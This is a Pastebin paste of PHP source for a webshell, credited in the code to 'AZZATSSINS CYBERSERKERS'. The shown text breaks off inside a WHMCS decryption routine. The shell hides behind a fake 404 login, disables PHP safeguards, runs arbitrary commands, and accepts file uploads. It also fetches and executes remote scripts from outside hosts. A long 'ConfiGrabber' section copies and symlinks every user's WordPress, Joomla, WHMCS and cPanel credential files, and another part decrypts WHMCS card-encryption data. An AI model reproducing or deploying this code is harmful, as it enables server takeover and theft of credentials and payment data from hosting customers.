API tools faq
paste
AZZATSSINS_CYBERSERK

MOBILE WEBSHELL V.01

AZZATSSINS_CYBERSERK
Jun 20th, 2016
404
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 29.08 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /*
  3. author: AZZATSSINS CYBERSERKERS
  4. default info:
  5. login page: file.php?mother=fucker
  6. password: A/Z
  7. */
  8. $auth_pass = "ed4544d345562697a49e5cfc6a8ab545";
  9. $color = "#00ff00";
  10. $default_action = 'FilesMan';
  11. @define('SELF_PATH', __FILE__);
  12. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  13.     header('HTTP/1.0 403');
  14.     exit;
  15. }
  16. @session_start();
  17. @error_reporting(0);
  18. @ini_set('error_log',NULL);
  19. @ini_set('log_errors',0);
  20. @ini_set('max_execution_time',0);
  21. @ini_set('display_errors', 0);
  22. @set_time_limit(0);
  23. @set_magic_quotes_runtime(0);
  24. @define('VERSION', '2.1');
  25. if( get_magic_quotes_gpc() ) {
  26.     function stripslashes_array($array) {
  27.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  28.     }
  29.     $_POST = stripslashes_array($_POST);
  30. }
  31. function echoLogin() {
  32. header('HTTP/1.0 404 Not Found');
  33. if($_GET['mother']=="fucker"){
  34. $phi = fopen("php.ini","w+");
  35. fwrite($phi,"safe_mode = Off
  36. disable_functions = NONE
  37. safe_mode_gid = OFF
  38. open_basedir = OFF ");
  39. echo'<style>
  40.        input { margin:0;background-color:#fff;border:1px solid #fff; }
  41.    </style>
  42.    <center>
  43.    <input type=password name=lol><br>
  44.    <input type=password name=lol><br>
  45.    <input type=password name=lol><br>
  46.    <input type=password name=lol><br>
  47.    <form method=post>
  48.    <input type=password name=pass>
  49.    </form><br>
  50.    <input type=password name=lol><br>
  51.    <input type=password name=lol><br>
  52.    <input type=password name=lol><br>
  53.    <input type=password name=lol><br>
  54.    </center>';
  55.     }
  56.     exit;
  57. }
  58. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  59.     if( empty( $auth_pass ) ||
  60.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  61.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  62.     else
  63.         echoLogin();
  64. @error_reporting(0);
  65. @ini_set('display_errors', 0);
  66. $phi = fopen("php.ini","w+");
  67. fwrite($phi,"safe_mode = Off
  68. disable_functions = NONE
  69. safe_mode_gid = OFF
  70. open_basedir = OFF ");
  71. echo'<html xmlns="http://www.w3.org/1999/xhtml"><head>
  72. <title> AZZATSSINS CYBERSERKERS </title>
  73. <link rel="stylesheet" href="http://aguswarteg.mwb.im/themes/mobile/EmoPinky/style.css" type="text/css">
  74. <script type="text/javascript" src="http://www.mywapblog.com/asset/MWB/js/image-resizer.js"></script>
  75. </head>
  76. <body>
  77. <div id="header">
  78. <h2 class="description">';
  79.  
  80. if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $userfile_name = $_FILES['azzatssins']['name']; $userfile_tmp = $_FILES['azzatssins']['tmp_name']; if (isset($_FILES['azzatssins']['name'])) { $abod = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $abod); echo"<center><b><a href='{$userfile_name}'>SUCCESS</a></b></center>"; } } else{ echo' <form method="POST" enctype="multipart/form-data"><input style="width:70%;height:28px;border:0;padding:0;background:#3a3a3a;color:#8f8f8f;" type="file" name="azzatssins"><input style="width:20%;height:28px;background:#2d2d2d;border:0;padding:0;margin:0;color:#7f7f7f;" type="Submit" name="Submit" value="UPLOAD"></form></center></BODY></HTML><br>'; }
  81. echo'<div id="navigation">
  82. <span><a href="#navigation-menu"> Navigasi </a></span><span><a href="http://www.google.com/search?q=AZZATSSINS"> Tentang Saya </a></span><span><a href="?"> Beranda </a></span>
  83. </div>
  84. </div>
  85. <div id="top-content">
  86. <div id="search-form">
  87. <form method="post">
  88. <input class="inp-text" type="text" name="command" value="">
  89. <input class="inp-btn" type="submit" name="submits" value="RUN">
  90. </form>
  91. </div>
  92. </div>
  93. <div id="content">
  94. <div class="post">
  95. <div class="post-meta">
  96. <h2 class="title"><b> PATH :'.getcwd().' </b></h2><br><br><b>';
  97. if(is_readable("/etc/named.conf")){
  98.  
  99. echo '[<font color=lime>/etc/named.conf</font>] ';
  100.  
  101. }else{
  102.  
  103. echo '[<font color=red>/etc/named.conf</font>] ';
  104.  
  105. }
  106.  
  107. if(is_readable("/etc/passwd")){
  108.  
  109. echo '[<font color=lime>/etc/passwd</font>] ';
  110.  
  111. }else{
  112.  
  113. echo '[<font color=red>/etc/passwd</font>] ';
  114.  
  115. }
  116.  
  117. if(is_readable("/etc/valiases")){
  118.  
  119. echo '[<font color=lime>/etc/valiases</font>] ';
  120.  
  121. }else{
  122.  
  123. echo '[<font color=red>/etc/valiases</font>] ';
  124.  
  125. }
  126.  
  127. if(is_readable("/var/named")){
  128.  
  129. echo '[<font color=lime>/var/named</font>] ';
  130.  
  131. }else{
  132.  
  133. echo '[<font color=red>/var/named</font>] ';
  134.  
  135. }
  136.  
  137. if(function_exists("symlink")){
  138.  
  139. echo '[<font color=lime>symlink</font>] ';
  140.  
  141. }else{
  142.  
  143. echo '[<font color=red>symlink</font>] ';
  144.  
  145. }
  146.  
  147. if(ini_get('disable_functions')){
  148.  
  149. echo '[<font color=red>'.ini_get('disable_functions').'</font>]';
  150.  
  151. }
  152. echo'</b></div>
  153. <div class="post-content" style="display: block !important; visibility: visible !important;">';
  154. if(isset($_POST['submits']))
  155. {
  156.  
  157. $cmd = $_POST['command'];
  158. if($cmd == "")
  159. {
  160.  
  161. echo "Please Insert Command!";
  162.  }
  163.  
  164. elseif(isset($cmd))
  165.  {
  166.  $output = system($cmd);
  167.  printf("$output \n");
  168.  }
  169.  }
  170. echo'<br>
  171. </div>
  172. <div class="post-meta2">';
  173. echo'<span><b>SERVER : '.system('uname -a').'</b></span><br>';
  174. if($_GET['mysql']=="connect"){
  175. $get = file_get_contents('http://wget.yu.tl/files/mysql.css');
  176. $bwt = fopen('mysql.php', 'w');
  177. fwrite($bwt,$get);
  178. fclose($bwt);
  179. echo'<meta http-equiv="Refresh" content= "0; url=mysql.php">';
  180. }
  181. if($_GET['symbolic']=="link"){
  182. $get = file_get_contents('http://x-x-x.yn.tl/py');
  183. $bwt = fopen('symlink.py', 'w');
  184. fwrite($bwt,$get);
  185. fclose($bwt);
  186. system('python symlink.py');unlink('symlink.py');
  187. echo'<meta http-equiv="Refresh" content= "0; url=sl/symlink.htm">';
  188. }
  189. if($_GET['config']=="grabber"){
  190.  ?>
  191. <title>ConfiGrabber V3.2 by AZZATSSINS</title><body bgcolor=silver><center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=mailto:cyberserkers@gmail.com>AZZATSSINS CYBERSERKERS</a></b></i></div><br><br><br><form method="post"><input type="hidden" cols="100" rows="100" name="passwd" value="<?php $usr=file("/etc/passwd"); foreach($usr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
  192. "><br>Your Folder  : <input type="text" class="input" name="folfig" size="10" value="CONFIGRAB">
  193. <input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:#fff;border:0;font-weight:bold;" name="conf" class="ipt" value="EXECUTE" type="submit"><br><br></form></center>
  194. <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
  195. if ($_POST['conf']) {
  196. $folfig = $_POST['folfig'];
  197. $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<font color=red>Symlnk Has Been Disable...!!!</font>');}
  198. @mkdir($folfig, 0755);
  199. @chdir($folfig);
  200. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex azzatssins.cyberserkers\nAddType txt .php\nAddHandler txt .php";
  201. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  202. $passwd=explode("\n",$_POST["passwd"]);
  203. foreach($passwd as $pwd){ $user=trim($pwd);
  204. symlink('/','000~ROOT~000');
  205. copy('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  206. symlink('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  207. copy('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  208. symlink('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  209. copy('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  210. symlink('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  211. symlink('/home/'.$user.'/public_html/.accesshash',$user.' <~ RESELLER.txt');
  212. copy('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  213. copy('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  214. copy('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
  215. copy('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  216. copy('/home/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
  217. copy('/home/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
  218. copy('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  219. copy('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  220. copy('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  221. copy('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  222. copy('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  223. copy('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  224. copy('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  225. copy('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  226. copy('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  227. copy('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  228. copy('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  229. copy('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  230. copy('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  231. copy('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  232. copy('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  233. copy('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  234. copy('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  235. copy('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  236. copy('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  237. copy('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  238. copy('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  239. copy('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
  240. copy('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  241. copy('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
  242. copy('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  243. copy('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  244. copy('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
  245. copy('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  246. copy('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  247. copy('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  248. copy('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  249. copy('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  250. copy('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  251. copy('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  252. copy('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  253. copy('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  254. copy('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  255. copy('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  256. copy('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  257. copy('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  258. copy('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  259. copy('/home/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
  260.  
  261. copy('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  262. copy('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  263. copy('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
  264. copy('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
  265. copy('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  266. copy('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  267. copy('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  268. copy('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  269. copy('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  270. copy('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  271. copy('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  272. copy('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  273. copy('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  274. copy('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  275. symlink('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  276. symlink('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  277. symlink('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
  278. symlink('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  279. symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
  280. symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
  281. symlink('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  282. symlink('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  283. symlink('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  284. symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  285. symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  286. symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  287. symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  288. symlink('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  289. symlink('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  290. symlink('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  291. symlink('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  292. symlink('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  293. symlink('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  294. symlink('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  295. symlink('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  296. symlink('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  297. symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  298. symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  299. symlink('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  300. symlink('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  301. symlink('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  302. symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
  303. symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  304. symlink('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
  305. symlink('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  306. symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  307. symlink('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
  308. symlink('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  309. symlink('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  310. symlink('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  311. symlink('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  312. symlink('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  313. symlink('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  314. symlink('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  315. symlink('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  316. symlink('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  317. symlink('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  318. symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  319. symlink('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  320. symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  321. symlink('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  322. symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
  323.  
  324. symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  325. symlink('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  326. symlink('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
  327. symlink('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
  328. symlink('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  329. symlink('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  330. symlink('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  331. symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  332. symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  333. symlink('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  334. symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  335. symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  336. symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  337. symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  338. copy('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  339. copy('/home/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  340. copy('/home/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  341. copy('/home/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  342. copy('/home/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  343. copy('/home/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  344. copy('/home/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  345. copy('/home/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  346. copy('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  347. copy('/home/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  348. copy('/home/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  349. copy('/home/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  350. copy('/home/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  351. copy('/home/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  352. copy('/home/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  353. copy('/home/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  354. copy('/home/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  355. copy('/home/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  356. copy('/home/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
  357. copy('/home/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  358. copy('/home/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  359. copy('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  360. copy('/home/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
  361. copy('/home/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
  362. copy('/home/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
  363. copy('/home/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  364. copy('/home/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
  365. copy('/home/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  366. copy('/home/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  367. copy('/home/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  368. copy('/home/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
  369. symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  370. symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  371. symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  372. symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  373. symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  374. symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  375. symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  376. symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  377. symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  378. symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  379. symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  380. symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  381. symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  382. symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  383. symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  384. symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  385. symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  386. /*You Can ReCoded But Don't Change ©CopyRight*/
  387. /*e.g: Recoded By xxxxxx & © AZZATSSINS*/
  388. symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  389. symlink('/home/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
  390. symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  391. symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  392. symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  393. symlink('/home/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
  394. symlink('/home/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
  395. symlink('/home/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
  396. symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  397. symlink('/home/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
  398. symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  399. symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  400. symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  401. symlink('/home/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
  402. }
  403. echo '<center><i><b><a href='.$folfig.'>CLICK IN HERE TO VIEW CONFIGS</a></b></i></center>';
  404. }
  405. }
  406. elseif(isset($_GET['whmcs']) && ($_GET['whmcs'] == 'decode'))
  407. {  
  408. ?>
  409. <form action="?whmcs=decode" method="post">
  410.  
  411. <?php
  412.  
  413. function decrypt ($string,$cc_encryption_hash)
  414. {
  415.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  416.     $hash_key = _hash ($key);
  417.     $hash_length = strlen ($hash_key);
  418.     $string = base64_decode ($string);
  419.     $tmp_iv = substr ($string, 0, $hash_length);
  420.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  421.     $iv = $out = '';
  422.     $c = 0;
  423.     while ($c < $hash_length)
  424.     {
  425.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  426.         ++$c;
  427.     }
  428.     $key = $iv;
  429.     $c = 0;
  430.     while ($c < strlen ($string))
  431.     {
  432.         if (($c != 0 AND $c % $hash_length == 0))
  433.         {
  434.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  435.         }
  436.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  437.         ++$c;
  438.     }
  439.     return $out;
  440. }
  441.  
  442. function _hash ($string)
  443. {
  444.     if (function_exists ('sha1'))
  445.     {
  446.         $hash = sha1 ($string);
  447.     }
  448.     else
  449.     {
  450.         $hash = md5 ($string);
  451.     }
  452.     $out = '';
  453.     $c = 0;
  454.     while ($c < strlen ($hash))
  455.     {
  456.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  457.         $c += 2;
  458.     }
  459.     return $out;
  460. }
  461.  
  462. echo "
  463. <br>
  464.  
  465. <FORM method='post'>
  466. <input type='hidden' name='form_action' value='2'>
  467. <br>
  468. <table class=tabnet style=width:320px;padding:0 1px;>
  469. <tr><th colspan=2>WHMCS Decoder</th></tr>
  470. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  471. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
  472. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
  473. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
  474. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
  475. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
  476. </table>
  477. </FORM>
  478. </center>
  479. ";
  480.  
  481.  if($_POST['form_action'] == 2 )
  482.  {
  483.  //include($file);
  484.  $db_host=($_POST['db_host']);
  485.  $db_username=($_POST['db_username']);
  486.  $db_password=($_POST['db_password']);
  487.  $db_name=($_POST['db_name']);
  488.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
  489.  
  490.  
  491.  
  492.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  493.         mysql_select_db($db_name,$link) ;
  494. $query = mysql_query("SELECT * FROM tblservers");
